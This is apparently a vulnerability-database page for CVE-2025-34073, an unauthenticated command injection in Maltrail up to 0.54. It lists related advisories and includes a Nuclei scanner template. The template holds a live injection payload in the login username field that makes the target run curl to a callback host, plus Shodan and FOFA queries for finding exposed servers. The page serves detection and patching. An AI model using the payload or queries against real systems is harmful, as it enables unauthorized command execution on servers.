| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| The vulnerability of the Maltrail malware detection system lies in the lack of authentication for the critical function, allowing the attacker to execute arbitrary code. | 14 Apr 202600:00 | – | bdu_fstec | |
| CVE-2025-34073 | 16 Aug 202322:01 | – | circl | |
| maltrail 安全漏洞 | 2 Jul 202500:00 | – | cnnvd | |
| CVE-2025-34073 | 2 Jul 202513:46 | – | cve | |
| CVE-2025-34073 stamparm/maltrail <=0.54 Remote Command Execution | 2 Jul 202513:46 | – | cvelist | |
| EUVD-2025-19716 | 2 Jul 202513:46 | – | euvd | |
| Maltrail Unauthenticated Command Injection | 17 Aug 202319:51 | – | metasploit | |
| CVE-2025-34073 | 2 Jul 202514:15 | – | nvd | |
| CVE-2025-34073 | 2 Jul 202514:15 | – | osv | |
| PT-2025-27631 | 2 Jul 202500:00 | – | ptsecurity |
id: CVE-2025-34073
info:
name: Maltrail <=0.54 Username Parameter - Remote Command Execution
author: SeungAh-Hong
severity: critical
description: |
Maltrail versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
impact: |
Unauthenticated attackers can execute arbitrary operating system commands through the username parameter in the login endpoint, achieving complete server compromise.
remediation: |
Upgrade Maltrail to version 0.55 or later that properly sanitizes user input in authentication handling.
reference:
- https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87
- https://vulncheck.com/advisories/stamparm-maltrail-rce
- https://github.com/stamparm/maltrail/issues/19146
- https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/maltrail_rce.rb
metadata:
max-request: 1
shodan-query: http.title:"Maltrail"
fofa-query: app="Maltrail"
tags: cve,cve2025,maltrail,rce,unauth,oss,vuln
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=;`curl http://{{interactsh-url}}`
matchers:
- type: dsl
dsl:
- 'contains(header, "Maltrail")'
- "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
condition: and
# digest: 4a0a0047304502202ecfc46f9715df9ea2d1e1c24d6e61dd1147aacbb654b347ee95a431976cdde002210086f1ffbbecb107c38ea162d3d31cdafebf98bc4e471a283e61597ef68c35c1c1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation